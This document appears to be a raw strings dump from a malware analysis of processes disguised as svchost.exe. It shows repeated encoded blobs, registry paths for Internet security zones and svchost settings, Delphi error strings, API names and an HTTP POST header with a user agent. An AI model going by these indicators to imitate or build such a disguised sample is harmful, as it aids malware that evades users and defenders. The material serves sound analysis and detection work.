B5rHo50A8lHpZEpzrQGE70xxnzrBw9oEtFr5hixcA1UkE8mZ6TxuEO97ZrHvaYhEPQROc7NFYLfvN4Ls Xo9fwhliBIEPlvOW6CFC7gCxaCQGxrg3qMLC0pyxKmXBAn1XVZ/sWNSeVhppuPNSk6dka7SVd V C06jg1DhrP9NvLtslNktXE qQxC5mFlZBjN9KSZmjNTwa 4ODdDVT6l87kOCyfaw/fYnqR/ jZKaTJNNqSjV/X Jf9tLWnLrnoe 2QwnSsHKhoRGKISt0cBUsXItPbYBY2AIxIOTji6nmyD1AFBU7G /DZGvDfDUxeTMpYpxZ1 BXDJHkTzq5McwQjfUCv7Z9D7nTqyj z/3l0nLyOsZIqm/9katu3rjlxAdNTZgEx/Zc0AIufCNZVbUHrxenFfvl9eUEByjTgazOYiIn4cR YdUBCpuYbmtUMH1vN0FIaZC/JWYHy55vYixDN402Ci5/vflQa6SHZFboiprMdVzjpUwCjVUz1lV/WH2IHje/SGys9//aznjD16aH8M1LYfnmsfU50ZcAT3AskGeF4Hn Dq2PhFcniFgFniWLsQTPqacsSRuU2fT5fENBrZ02ybC5hTPZkVOldfUcoQC 6jFKNtvLisdViqnEn6ql0WsNCeRTA6QtwPh50ZJVYcw9iRNgwy09r4Ieu0rcl9r2QvZ K8v4Hhb5iGRlEY0sOj2rM54ZdDDO52xOJ5Hdht7NkFQet0CkL 8kVpUuNiYQfatX/wE6AHBZ/qlaGQLPAuxcQrR4yxc7ND6Uo6Qu26QAPLUPKJVXdeK0ZQ6AuFYCC Gksj5BSLrfTYvhGd2Y0P82eTgUzkBm6AkeVVQ/cpT xTC5w6jKde/sVn07 K/T/W 9ufdvqkYwM1adGHOUhyATQBwCGzJC4H8YtF/YZ/YC3olBlKuY8iHfjY16F6Udm/YWZ x7uWJLT7BuDMGOcxrskcVrV7iYeTH6uK2BwOTPbCFcN4iKwYZKvGoVC8B7SOfbmWT5bEKmLo1R3H0YvYKuP2x9n6YCrszz2TZKbg1m2ugxneto/5ZM8dTsE4ivOkllpOYcnflTY3oBqqAwpuRth0UrPyDzGwn9Z/J3KUrWgSGnqSEAm4Txx7YhUdawT6rBs=KQdZsrD1QhacXmQpPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGX

GcAQm81TXQ20gBQBfGzUUyITkVnuf6ZokztbVCBoXIkLEXZuX3K6Tq/kMmlUSJN5i4798 S07ThYVRcJlJzpssn8BeOAKxFAmxN1MmvqgFTEd8SeXkAI50Nm08Mdi1T794hz4w RqId TNhNtQGZ30DN sUxW8YTlNLHogIsZXdA3r0LqgrlFbvfeObL1d ABivgHLbuDjQUpeVdLeaduvmWAagE0ADmxsx0sqM50BuHv3pWRY5/ptsKVVf6AkKuMd7r6G Fj4ZXmY4m0RqIsfGJ9u3IqMibLkaZwIl8GKsFspvb wvDHgg0u6VI mDwAQ0LUOD7qwXiwAlBmlLTXTE4vCd7wHU0H/ouUKmbCrNoF 0tlR3keUXDn0NID1CuTV 53fQ3miPeMTKaw5qHOnV6Wq jpi5l6v/dmzxRVWC5Cff9Qebg6XJjREK4oUBaJd2pRVdeUiMuyoAc/3zyuLJfRuT 58D9KIKr v1pVPO81nj1MDj6FSQYrf54kItfRGMeGKEqrp2KW6jP8/UREYrqhYcv4pFx6wahmeWsOeKEh8xC4KdtQ3Xw7tj5P971uHekfA1YhlG2V4wabNQi44CjtQ2qPxnmupnPpaUBY51 VANO8XEgrQ76/8PXTaE8jnOa3orrrE3zQJj9gdxUs QeFaWK nlsitcqZpl2SV4OaAHOUqa1STXYhCBQkdiG31TIywBxkxDBThzdrfrH5aI0WPgLZt7keh2WNsh4kNsYW1Ww6faxrtnHmfDBj9FXN31Qur2/RJroZYq9Sie3TC3IUXAnQLSnhAgXmDJfkzW4o/MGSDQo//LAj1RHUgp0WEzhOv5Ys1Hp1L7Ns kK2fuf4fJauYssZYdDBQd Jgd/xxzUOc2CiqnO DwwwG13y9PLBG1cRQozcwiHRPRV2eISfVXBgcj2Zj6D8YGiVzoScCI8 V wdNkhhBObIJQJyEcuzOYHu4lIZVKE0zWpMuN76N55TXtv9DKaBnfYz1EiDjo9eOf vtK2vzuGFWtb9M1HpuvertQtKHirxnsrPSLYBEejLt0BS1vtcXqnX7AXXCIizI/YycVNmyCWjUFtwPa5w2RI97w5wmx0pt8gqJvTm8zlRjUkavyJ7EVJZeTqDJtDir8aRJ3WTWzPfGizYxZM2uv/Aj437fW3xQfcmNXsfa6XqD2JII 8tiVEftxyWMzKaBktW/HwySeUxuU7AN gQtTpprzTnvVTr8PmWTao7eTUStsJ1vKIz5ZVXzUtzU4T1hG//GXgs1MIumW2irhAnMhExLvKEJucnazTprqmMDUuoMOZSLXv/U6QHABgGGIXHvtq0jBdl/1vj0vHf3XmI2jQc13qIS6ZYP z7H/XtMhVd3Ndz Or26Z4oWY oweJzP/Oa3l1ayVXaIYs3K7QoHt5vakSB4XJ9LXmctV01bUM/4jSuY5O7az8 u9BVRJ4Q4pCRU 82fVtZTIo7iy8zyrdx7St9QSadSLOX/UxqYVbEFG4OKrj6lUfoMm35az8Td19uSQNn8kVVfYJre60OmxhzJrF2tFOd Mbx7s5jcO1aL4 QuO6h0m 7zuT80TUeapOGmY4s3q4TCtJ88oX6leNS5n645pHAOpcUh7KX6oKol6y6fMNpWZpxMiUL8tnQIdsMZ93oWkhUAlyD6/wDi/y3YhLJdzxFrqSdDf7yNdNOmBQrVLnPLQIbAHi3EKhLsbWb8huds2y34ScNd0BHS0G2G4wJRby7adZ5kQD80QH0ZWNSsTjiQT8vMLNGIKk020fO5wQNsMlQlamhN04gdsLkhjKYMID0YvGGOC2PB5X8WtfOxhf6DTH0E/adetexYzVc9b0xieJw0PNJIwznajHmkrJBiI1aGBr1uU9QgbsbNVtgkFy4Qd4bqz71ZF1CT9ODQEo3NakWUrGGw3w9kCb/9ztCaZqVm4gzGJ7WUAY1EYSl9mm5xeFauRQkurR7tEIU X pb1WiVNYc4ZDnnIO8n9pcIBTmDKCuxljCn1IObMRS1Hx6Ou2EqvxsWhJgWst6V9PDM/QrCxX43hIe/Vgp0G971Qn2BpZP8cU1qvouvmC60GK7GqJYJhxIFziUqwFKrAGAFKRBumb1NEeZdxpHbe3Zvs01cE0a5KsqDN7Ap7xS1fm fDJPi79zXzOW7kkeQ59eM0hmso33wqe5lYti6bLHTvf9bBA67ljQzttgsnSHsG5MtfyEhdPTkS9ePfM7Q59T05luA5y1KlpcxY6yBc0VQhVAgG6tLeA4HPUkNts QdYPIXYswl/Dgns6ET7RjGfSy5jakzU3CIQDB3y6RIQXSzNrYPcd4QPfDMYN8pHCd9FWNBGcBDa6FPSaRljyYp9bEQwuPGPt6dWDSj3cwzF1UkmlysJvFIrsQ1YEHgUE38LO48mxRmeE6ZQDvlGMkhpywQJmu4e5vAkFoal7/ywz1g1WRRYDy7eS 33yhcbrXj5E3bvuqSjY jMrKMciNRhlkBzAZdMg1pCFZz41rUH epbJO3s5tiXayssXHT5DjihwM5CmlJI3OuJ1kZeqpPoJyZFgFBfGWxu5GmEupyxPwg1 833ILD4f6CXBKFWWJ9JwujqhvdgQK0OBIIrNhKrk8SA3X2l4451P974Vyvko2xSnZrPpvPSqKjjKT8Gsw nzWVSaPLDDBCt2OvVaDwSi2bPfPJcF20io1M/ uPHMFpIrkuH0cNqSEpUhI/vLddNDoNrMe2mfENdq6vK7vxlujmm8dEtgtzcnF03HNeM EA3czdIr0pylvmaQGDqOXf4MdLgoudWzTwEwMZTkjqrdB94a2qsalNOnlObnpaAQjddW6TnlfZ7DQ84Gxk0fdtTa0Dbj62rS6NvKVw4JRpOzeyOIcus30tdMfpOyqjK1KWX6dgL iGzrKS9SD30q6JuYZPrwlqffR5mWrV1M7eKA9oaw61X4xVCv4P85UWnK6wGINqGMB7Ttci1etNFgCBLqZ28Zmihmzdt7MYbmvoPLJo GgnbHxKTD2DevgtEF2jxS9byvrb fZHiAGfyOv3Wf/bFqXPkhXyuOQjWZ9tJ5zNiR70rLADHsEfifApUdCmOLQimQj6df4jgsH9ENqDlOKSr7RcXRYPzW30Zse0Qmdb8AXvpb1JAdPT73NRfUjiuBAPvRvhJARW4En3Q1Icr8cEFtRHOsLx1KfmvWM6 Gcsb5fezmKFLGNn/UQav7AAd4v78N2lbZ4CVOh7Xe55fc2CbxgxgEDQuF1/gSCnvTtYtwd2M4B/Ding6ZZa9U2MlMtcnt7HN 1hPZM Ux4B3n3nidCgztYEvlyKy30tdWFPhrTym9ECv3EfANPRAH5Z13O2R5SkGo7EGKpcB9SbPIJXzmtXwTcFjxxLx3zj1yu XYzCWbBCzPTJur9GIdRbEA0mI8xDU6F8noLfUwfrnvvGM5TXjOL r7JDTfGnWOGan NR0/ThvFkhVHQ7yC0t31OQtj9Hcq6AmbQlCAmY5XJpBOnmTPco3hO8uqHOjllv3ZP927jDYlYZvxBTQ7hLJcZNbfUohzHM/Mgt6y Hf11N7dNlCIgS d9iKR035oLCyf25xkIn5m9dEdBuFvlXiSwJ8MOIHXDtxG3IHerUQQ22xDpUfg5u1zrc4jGXJE4g8lFs3 gAMFa1wD89AGezWUcVhA2kUX6pDjOCv33McDLf7n/d/oHwuwl5S2q4XGLhyfFNs T3z1bFyy7MHiFt1Tolp0GwRDXYlPH5CD8W7EIqNXwjKNYh0kTezf8f4MjaAGDwaNSDfclIpOU4ZpT ccqWxFoeqvgCsWKsMyWSlLO2aEIICQWXEk0NTbbC0wVZkIDy XmYvpAa5H3XXZU3YDuYsmOpT7f2DlSj8GUXUUWsj8goRbNoyjcuie6OlPpWyo3vQdy/ORmdRUZJ3Q1gkSTUrhSK6lOJImAn5phb3qro WQoccDOBM/cyNBj7MA2Oz0d qVaPiNsAooUIMdb2v3BWUr9rQCUUTOOlyu9kUYix4aPGNTp lmD3M lWDHvCS1YspQK3jj6JrrIzjS8hovpXk1VM32Kuy7HIWphH gUg04W10YQE 1vOWBCBYuNC0wxIJCxRrXdGe/MdUnwYrq5DBjLazUwmUDm7a1OvTt8gjg3qWHBHJMyjjBwXyxbRWb9Iv F98VAZDZX61L2OhbMdkVk X1pdbV0faBN3gFoRR/gp31CpMIJGqTqqxzHl PmhoqEOwVOInMh9FAM5DS8LC3CxGxZZK9oZZonnFALAOUmhocV7oQT/lmPBt0NrS12yRaaqdSxuqyLLAz8P2ebqz3P8cUaaxU6/R0IdzDLGNi1tCZSeXy5qoJKHCDjJOuzJL6jNPlLNiKF4nhNUbGIqkcR1bXgkCs8UCrQtvyGgbQkLcxmX7k4f KGo28pwD2qwlOAt2OIktOV1bwijm2qmZT2chywyMYGgX2UC6KN3zN1vShO9WcJhHo2ZiriX4d6l0sHNnnreaH7nbidheScoYCdKgeu KC218FnYGmldHBeyQGbJId4itioBO8qM6D8ZSPEWyT/kV8yRbRRZUNTPrfAs636MA3plxT21/eazTnTcYQ0fgRHtEc6blERNiA5dOZhqpfaBvlRklfn4o3Jztvao6On51RR9W1apk3cGUc2kv1TqT5BQYZZ6PSaxMMs7bxLjwdceVWRlyCBf7X0cIs9KzqTEKDKTLBeHSngPLRXu8yj0mZuYkULBsPGf5004LwZ0yDBrt4DnQs90VN8H9p/7aVJ4zW Fp5vSYZs3Hg TmntT6Ui9loHvaShGmx9Li4zhJjLd57p kb7 bGijQCP1Vo74sI8NyI9Kq0Y7nT0lqyQ6OEXld9Xs1KvJeA1moykaTVHtOK 7nhFZXrl4uDJw/EjEHvzYgicXVynGRHnH6dY/eUYHztU3Xa6auo7UakTnYboq5SQhrR2q4FiH0S6qFWe/usej4FTrEz/kfc/UB7DK8GKiwtYiocDZS71nLEk6BHKu5cGAsQ1rdPJvVrAG1fn Be1KOQ9CML4bvKzr B5rHo50A8lHpZEpzrQGE70xxnzrBw9oEtFr5hixcA1UkE8mZ6TxuEO97ZrHvaYhEPQROc7NFYLfvN4Ls Xo9fwhliBIEPlvOW6CFC7gCxaCQGxrg3qMLC0pyxKmXBAn1XVZ/sWNSeVhppuPNSk6dka7SVd V C06jg1DhrP9NvLtslNktXE qQxC5mFlZBjN9KSZmjNTwa 4ODdDVT6l87kOCyfaw/fYnqR/ jZKaTJNNqSjV/X Jf9tLWnLrnoe 2QwnSsHKhoRGKISt0cBUsXItPbYBY2AIxIOTji6nmyD1AFBU7G /DZGvDfDUxeTMpYpxZ1 BXDJHkTzq5McwQjfUCv7Z9D7nTqyj z/3l0nLyOsZIqm/9katu3rjlxAdNTZgEx/Zc0AIufCNZVbUHrxenFfvl9eUEByjTgazOYiIn4cR YdUBCpuYbmtUMH1vN0FIaZC/JWYHy55vYixDN402Ci5/vflQa6SHZFboiprMdVzjpUwCjVUz1lV/WH2IHje/SGys9//aznjD16aH8M1LYfnmsfU50ZcAT3AskGeF4Hn Dq2PhFcniFgFniWLsQTPqacsSRuU2fT5fENBrZ02ybC5hTPZkVOldfUcoQC 6jFKNtvLisdViqnEn6ql0WsNCeRTA6QtwPh50ZJVYcw9iRNgwy09r4Ieu0rcl9r2QvZ K8v4Hhb5iGRlEY0sOj2rM54ZdDDO52xOJ5Hdht7NkFQet0CkL 8kVpUuNiYQfatX/wE6AHBZ/qlaGQLPAuxcQrR4yxc7ND6Uo6Qu26QAPLUPKJVXdeK0ZQ6AuFYCC Gksj5BSLrfTYvhGd2Y0P82eTgUzkBm6AkeVVQ/cpT xTC5w6jKde/sVn07 K/T/W 9ufdvqkYwM1adGHOUhyATQBwCGzJC4H8YtF/YZ/YC3olBlKuY8iHfjY16F6Udm/YWZ x7uWJLT7BuDMGOcxrskcVrV7iYeTH6uK2BwOTPbCFcN4iKwYZKvGoVC8B7SOfbmWT5bEKmLo1R3H0YvYKuP2x9n6YCrszz2TZKbg1m2ugxneto/5ZM8dTsE4ivOkllpOYcnflTY3oBqqAwpuRth0UrPyDzGwn9Z/J3KUrWgSGnqSEAm4Txx7YhUdawT6rBs=KQdZsrD1QhacXmQpPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXc

GcAQm81TXQ20gBQBfGzUUyITkVnuf6ZokztbVCBoXIkLEXZuX3K6Tq/kMmlUSJN5i4798 S07ThYVRcJlJzpssn8BeOAKxFAmxN1MmvqgFTEd8SeXkAI50Nm08Mdi1T794hz4w RqId TNhNtQGZ30DN sUxW8YTlNLHogIsZXdA3r0LqgrlFbvfeObL1d ABivgHLbuDjQUpeVdLeaduvmWAagE0ADmxsx0sqM50BuHv3pWRY5/ptsKVVf6AkKuMd7r6G Fj4ZXmY4m0RqIsfGJ9u3IqMibLkaZwIl8GKsFspvb wvDHgg0u6VI mDwAQ0LUOD7qwXiwAlBmlLTXTE4vCd7wHU0H/ouUKmbCrNoF 0tlR3keUXDn0NID1CuTV 53fQ3miPeMTKaw5qHOnV6Wq jpi5l6v/dmzxRVWC5Cff9Qebg6XJjREK4oUBaJd2pRVdeUiMuyoAc/3zyuLJfRuT 58D9KIKr v1pVPO81nj1MDj6FSQYrf54kItfRGMeGKEqrp2KW6jP8/UREYrqhYcv4pFx6wahmeWsOeKEh8xC4KdtQ3Xw7tj5P971uHekfA1YhlG2V4wabNQi44CjtQ2qPxnmupnPpaUBY51 VANO8XEgrQ76/8PXTaE8jnOa3orrrE3zQJj9gdxUs QeFaWK nlsitcqZpl2SV4OaAHOUqa1STXYhCBQkdiG31TIywBxkxDBThzdrfrH5aI0WPgLZt7keh2WNsh4kNsYW1Ww6faxrtnHmfDBj9FXN31Qur2/RJroZYq9Sie3TC3IUXAnQLSnhAgXmDJfkzW4o/MGSDQo//LAj1RHUgp0WEzhOv5Ys1Hp1L7Ns kK2fuf4fJauYssZYdDBQd Jgd/xxzUOc2CiqnO DwwwG13y9PLBG1cRQozcwiHRPRV2eISfVXBgcj2Zj6D8YGiVzoScCI8 V wdNkhhBObIJQJyEcuzOYHu4lIZVKE0zWpMuN76N55TXtv9DKaBnfYz1EiDjo9eOf vtK2vzuGFWtb9M1HpuvertQtKHirxnsrPSLYBEejLt0BS1vtcXqnX7AXXCIizI/YycVNmyCWjUFtwPa5w2RI97w5wmx0pt8gqJvTm8zlRjUkavyJ7EVJZeTqDJtDir8aRJ3WTWzPfGizYxZM2uv/Aj437fW3xQfcmNXsfa6XqD2JII 8tiVEftxyWMzKaBktW/HwySeUxuU7AN gQtTpprzTnvVTr8PmWTao7eTUStsJ1vKIz5ZVXzUtzU4T1hG//GXgs1MIumW2irhAnMhExLvKEJucnazTprqmMDUuoMOZSLXv/U6QHABgGGIXHvtq0jBdl/1vj0vHf3XmI2jQc13qIS6ZYP z7H/XtMhVd3Ndz Or26Z4oWY oweJzP/Oa3l1ayVXaIYs3K7QoHt5vakSB4XJ9LXmctV01bUM/4jSuY5O7az8 u9BVRJ4Q4pCRU 82fVtZTIo7iy8zyrdx7St9QSadSLOX/UxqYVbEFG4OKrj6lUfoMm35az8Td19uSQNn8kVVfYJre60OmxhzJrF2tFOd Mbx7s5jcO1aL4 QuO6h0m 7zuT80TUeapOGmY4s3q4TCtJ88oX6leNS5n645pHAOpcUh7KX6oKol6y6fMNpWZpxMiUL8tnQIdsMZ93oWkhUAlyD6/wDi/y3YhLJdzxFrqSdDf7yNdNOmBQrVLnPLQIbAHi3EKhLsbWb8huds2y34ScNd0BHS0G2G4wJRby7adZ5kQD80QH0ZWNSsTjiQT8vMLNGIKk020fO5wQNsMlQlamhN04gdsLkhjKYMID0YvGGOC2PB5X8WtfOxhf6DTH0E/adetexYzVc9b0xieJw0PNJIwznajHmkrJBiI1aGBr1uU9QgbsbNVtgkFy4Qd4bqz71ZF1CT9ODQEo3NakWUrGGw3w9kCb/9ztCaZqVm4gzGJ7WUAY1EYSl9mm5xeFauRQkurR7tEIU X pb1WiVNYc4ZDnnIO8n9pcIBTmDKCuxljCn1IObMRS1Hx6Ou2EqvxsWhJgWst6V9PDM/QrCxX43hIe/Vgp0G971Qn2BpZP8cU1qvouvmC60GK7GqJYJhxIFziUqwFKrAGAFKRBumb1NEeZdxpHbe3Zvs01cE0a5KsqDN7Ap7xS1fm fDJPi79zXzOW7kkeQ59eM0hmso33wqe5lYti6bLHTvf9bBA67ljQzttgsnSHsG5MtfyEhdPTkS9ePfM7Q59T05luA5y1KlpcxY6yBc0VQhVAgG6tLeA4HPUkNts QdYPIXYswl/Dgns6ET7RjGfSy5jakzU3CIQDB3y6RIQXSzNrYPcd4QPfDMYN8pHCd9FWNBGcBDa6FPSaRljyYp9bEQwuPGPt6dWDSj3cwzF1UkmlysJvFIrsQ1YEHgUE38LO48mxRmeE6ZQDvlGMkhpywQJmu4e5vAkFoal7/ywz1g1WRRYDy7eS 33yhcbrXj5E3bvuqSjY jMrKMciNRhlkBzAZdMg1pCFZz41rUH epbJO3s5tiXayssXHT5DjihwM5CmlJI3OuJ1kZeqpPoJyZFgFBfGWxu5GmEupyxPwg1 833ILD4f6CXBKFWWJ9JwujqhvdgQK0OBIIrNhKrk8SA3X2l4451P974Vyvko2xSnZrPpvPSqKjjKT8Gsw nzWVSaPLDDBCt2OvVaDwSi2bPfPJcF20io1M/ uPHMFpIrkuH0cNqSEpUhI/vLddNDoNrMe2mfENdq6vK7vxlujmm8dEtgtzcnF03HNeM EA3czdIr0pylvmaQGDqOXf4MdLgoudWzTwEwMZTkjqrdB94a2qsalNOnlObnpaAQjddW6TnlfZ7DQ84Gxk0fdtTa0Dbj62rS6NvKVw4JRpOzeyOIcus30tdMfpOyqjK1KWX6dgL iGzrKS9SD30q6JuYZPrwlqffR5mWrV1M7eKA9oaw61X4xVCv4P85UWnK6wGINqGMB7Ttci1etNFgCBLqZ28Zmihmzdt7MYbmvoPLJo GgnbHxKTD2DevgtEF2jxS9byvrb fZHiAGfyOv3Wf/bFqXPkhXyuOQjWZ9tJ5zNiR70rLADHsEfifApUdCmOLQimQj6df4jgsH9ENqDlOKSr7RcXRYPzW30Zse0Qmdb8AXvpb1JAdPT73NRfUjiuBAPvRvhJARW4En3Q1Icr8cEFtRHOsLx1KfmvWM6 Gcsb5fezmKFLGNn/UQav7AAd4v78N2lbZ4CVOh7Xe55fc2CbxgxgEDQuF1/gSCnvTtYtwd2M4B/Ding6ZZa9U2MlMtcnt7HN 1hPZM Ux4B3n3nidCgztYEvlyKy30tdWFPhrTym9ECv3EfANPRAH5Z13O2R5SkGo7EGKpcB9SbPIJXzmtXwTcFjxxLx3zj1yu XYzCWbBCzPTJur9GIdRbEA0mI8xDU6F8noLfUwfrnvvGM5TXjOL r7JDTfGnWOGan NR0/ThvFkhVHQ7yC0t31OQtj9Hcq6AmbQlCAmY5XJpBOnmTPco3hO8uqHOjllv3ZP927jDYlYZvxBTQ7hLJcZNbfUohzHM/Mgt6y Hf11N7dNlCIgS d9iKR035oLCyf25xkIn5m9dEdBuFvlXiSwJ8MOIHXDtxG3IHerUQQ22xDpUfg5u1zrc4jGXJE4g8lFs3 gAMFa1wD89AGezWUcVhA2kUX6pDjOCv33McDLf7n/d/oHwuwl5S2q4XGLhyfFNs T3z1bFyy7MHiFt1Tolp0GwRDXYlPH5CD8W7EIqNXwjKNYh0kTezf8f4MjaAGDwaNSDfclIpOU4ZpT ccqWxFoeqvgCsWKsMyWSlLO2aEIICQWXEk0NTbbC0wVZkIDy XmYvpAa5H3XXZU3YDuYsmOpT7f2DlSj8GUXUUWsj8goRbNoyjcuie6OlPpWyo3vQdy/ORmdRUZJ3Q1gkSTUrhSK6lOJImAn5phb3qro WQoccDOBM/cyNBj7MA2Oz0d qVaPiNsAooUIMdb2v3BWUr9rQCUUTOOlyu9kUYix4aPGNTp lmD3M lWDHvCS1YspQK3jj6JrrIzjS8hovpXk1VM32Kuy7HIWphH gUg04W10YQE 1vOWBCBYuNC0wxIJCxRrXdGe/MdUnwYrq5DBjLazUwmUDm7a1OvTt8gjg3qWHBHJMyjjBwXyxbRWb9Iv F98VAZDZX61L2OhbMdkVk X1pdbV0faBN3gFoRR/gp31CpMIJGqTqqxzHl PmhoqEOwVOInMh9FAM5DS8LC3CxGxZZK9oZZonnFALAOUmhocV7oQT/lmPBt0NrS12yRaaqdSxuqyLLAz8P2ebqz3P8cUaaxU6/R0IdzDLGNi1tCZSeXy5qoJKHCDjJOuzJL6jNPlLNiKF4nhNUbGIqkcR1bXgkCs8UCrQtvyGgbQkLcxmX7k4f KGo28pwD2qwlOAt2OIktOV1bwijm2qmZT2chywyMYGgX2UC6KN3zN1vShO9WcJhHo2ZiriX4d6l0sHNnnreaH7nbidheScoYCdKgeu KC218FnYGmldHBeyQGbJId4itioBO8qM6D8ZSPEWyT/kV8yRbRRZUNTPrfAs636MA3plxT21/eazTnTcYQ0fgRHtEc6blERNiA5dOZhqpfaBvlRklfn4o3Jztvao6On51RR9W1apk3cGUc2kv1TqT5BQYZZ6PSaxMMs7bxLjwdceVWRlyCBf7X0cIs9KzqTEKDKTLBeHSngPLRXu8yj0mZuYkULBsPGf5004LwZ0yDBrt4DnQs90VN8H9p/7aVJ4zW Fp5vSYZs3Hg TmntT6Ui9loHvaShGmx9Li4zhJjLd57p kb7 bGijQCP1Vo74sI8NyI9Kq0Y7nT0lqyQ6OEXld9Xs1KvJeA1moykaTVHtOK 7nhFZXrl4uDJw/EjEHvzYgicXVynGRHnH6dY/eUYHztU3Xa6auo7UakTnYboq5SQhrR2q4FiH0S6qFWe/usej4FTrEz/kfc/UB7DK8GKiwtYiocDZS71nLEk6BHKu5cGAsQ1rdPJvVrAG1fn Be1KOQ9CML4bvKzr B5rHo50A8lHpZEpzrQGE70xxnzrBw9oEtFr5hixcA1UkE8mZ6TxuEO97ZrHvaYhEPQROc7NFYLfvN4Ls Xo9fwhliBIEPlvOW6CFC7gCxaCQGxrg3qMLC0pyxKmXBAn1XVZ/sWNSeVhppuPNSk6dka7SVd V C06jg1DhrP9NvLtslNktXE qQxC5mFlZBjN9KSZmjNTwa 4ODdDVT6l87kOCyfaw/fYnqR/ jZKaTJNNqSjV/X Jf9tLWnLrnoe 2QwnSsHKhoRGKISt0cBUsXItPbYBY2AIxIOTji6nmyD1AFBU7G /DZGvDfDUxeTMpYpxZ1 BXDJHkTzq5McwQjfUCv7Z9D7nTqyj z/3l0nLyOsZIqm/9katu3rjlxAdNTZgEx/Zc0AIufCNZVbUHrxenFfvl9eUEByjTgazOYiIn4cR YdUBCpuYbmtUMH1vN0FIaZC/JWYHy55vYixDN402Ci5/vflQa6SHZFboiprMdVzjpUwCjVUz1lV/WH2IHje/SGys9//aznjD16aH8M1LYfnmsfU50ZcAT3AskGeF4Hn Dq2PhFcniFgFniWLsQTPqacsSRuU2fT5fENBrZ02ybC5hTPZkVOldfUcoQC 6jFKNtvLisdViqnEn6ql0WsNCeRTA6QtwPh50ZJVYcw9iRNgwy09r4Ieu0rcl9r2QvZ K8v4Hhb5iGRlEY0sOj2rM54ZdDDO52xOJ5Hdht7NkFQet0CkL 8kVpUuNiYQfatX/wE6AHBZ/qlaGQLPAuxcQrR4yxc7ND6Uo6Qu26QAPLUPKJVXdeK0ZQ6AuFYCC Gksj5BSLrfTYvhGd2Y0P82eTgUzkBm6AkeVVQ/cpT xTC5w6jKde/sVn07 K/T/W 9ufdvqkYwM1adGHOUhyATQBwCGzJC4H8YtF/YZ/YC3olBlKuY8iHfjY16F6Udm/YWZ x7uWJLT7BuDMGOcxrskcVrV7iYeTH6uK2BwOTPbCFcN4iKwYZKvGoVC8B7SOfbmWT5bEKmLo1R3H0YvYKuP2x9n6YCrszz2TZKbg1m2ugxneto/5ZM8dTsE4ivOkllpOYcnflTY3oBqqAwpuRth0UrPyDzGwn9Z/J3KUrWgSGnqSEAm4Txx7YhUdawT6rBs=KQdZsrD1QhacXmQpPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXc

Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3

Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3

Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1

Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1

66006666

66006666

.Method '%s' not supported by automation object/Variant does not reference an automation object

.Method '%s' not supported by automation object/Variant does not reference an automation object

External exception %x

External exception %x

Interface not supported

Interface not supported

%s (%s, line %d)

%s (%s, line %d)

Abstract Error?Access violation at address %p in module '%s'. %s of address %p

Abstract Error?Access violation at address %p in module '%s'. %s of address %p

Invalid pointer operation

Invalid pointer operation

Invalid class typecast0Access violation at address %p. %s of address %p

Invalid class typecast0Access violation at address %p. %s of address %p

Privileged instruction%Exception %s in module %s at %p.

Privileged instruction%Exception %s in module %s at %p.

Application Error1Format '%s' invalid or incompatible with argument

Application Error1Format '%s' invalid or incompatible with argument

No argument for format '%s'

No argument for format '%s'

Invalid variant operation"Variant method calls not supported

Invalid variant operation"Variant method calls not supported

I/O error %d

I/O error %d

Integer overflow Invalid floating point operation

Integer overflow Invalid floating point operation

c:\%original file name%.exe path>path

c:\%original file name%.exe path>path

svchost.exe_640_rwx_01000000_00006000:

.text

.text

`.data

`.data

.rsrc

.rsrc

ADVAPI32.dll

ADVAPI32.dll

KERNEL32.dll

KERNEL32.dll

NTDLL.DLL

NTDLL.DLL

RPCRT4.dll

RPCRT4.dll

NETAPI32.dll

NETAPI32.dll

ole32.dll

ole32.dll

ntdll.dll

ntdll.dll

RegCloseKey

RegCloseKey

RegOpenKeyExW

RegOpenKeyExW

GetProcessHeap

GetProcessHeap

NtOpenKey

NtOpenKey

svchost.pdb

svchost.pdb

\PIPE\

\PIPE\

Software\Microsoft\Windows NT\CurrentVersion\Svchost

Software\Microsoft\Windows NT\CurrentVersion\Svchost

\Registry\Machine\System\CurrentControlSet\Control\SecurePipeServers\

\Registry\Machine\System\CurrentControlSet\Control\SecurePipeServers\

5.1.2600.5512 (xpsp.080413-2111)

5.1.2600.5512 (xpsp.080413-2111)

svchost.exe

svchost.exe

Windows

Windows

Operating System

Operating System

5.1.2600.5512

5.1.2600.5512

svchost.exe_932:

.idata

.idata

.reloc

.reloc

P.rsrc

P.rsrc

Portions Copyright (c) 1983,99 Borland

Portions Copyright (c) 1983,99 Borland

kernel32.dll

kernel32.dll

Software\Microsoft\Windows NT\CurrentVersion

Software\Microsoft\Windows NT\CurrentVersion

HTTP/1.1

HTTP/1.1

Content-Type: application/x-www-form-urlencoded

Content-Type: application/x-www-form-urlencoded

wininet.dll

wininet.dll

user32.dll

user32.dll

ntdll.dll

ntdll.dll

URLMON.DLL

URLMON.DLL

Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; rv:11.0) like Gecko

Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; rv:11.0) like Gecko

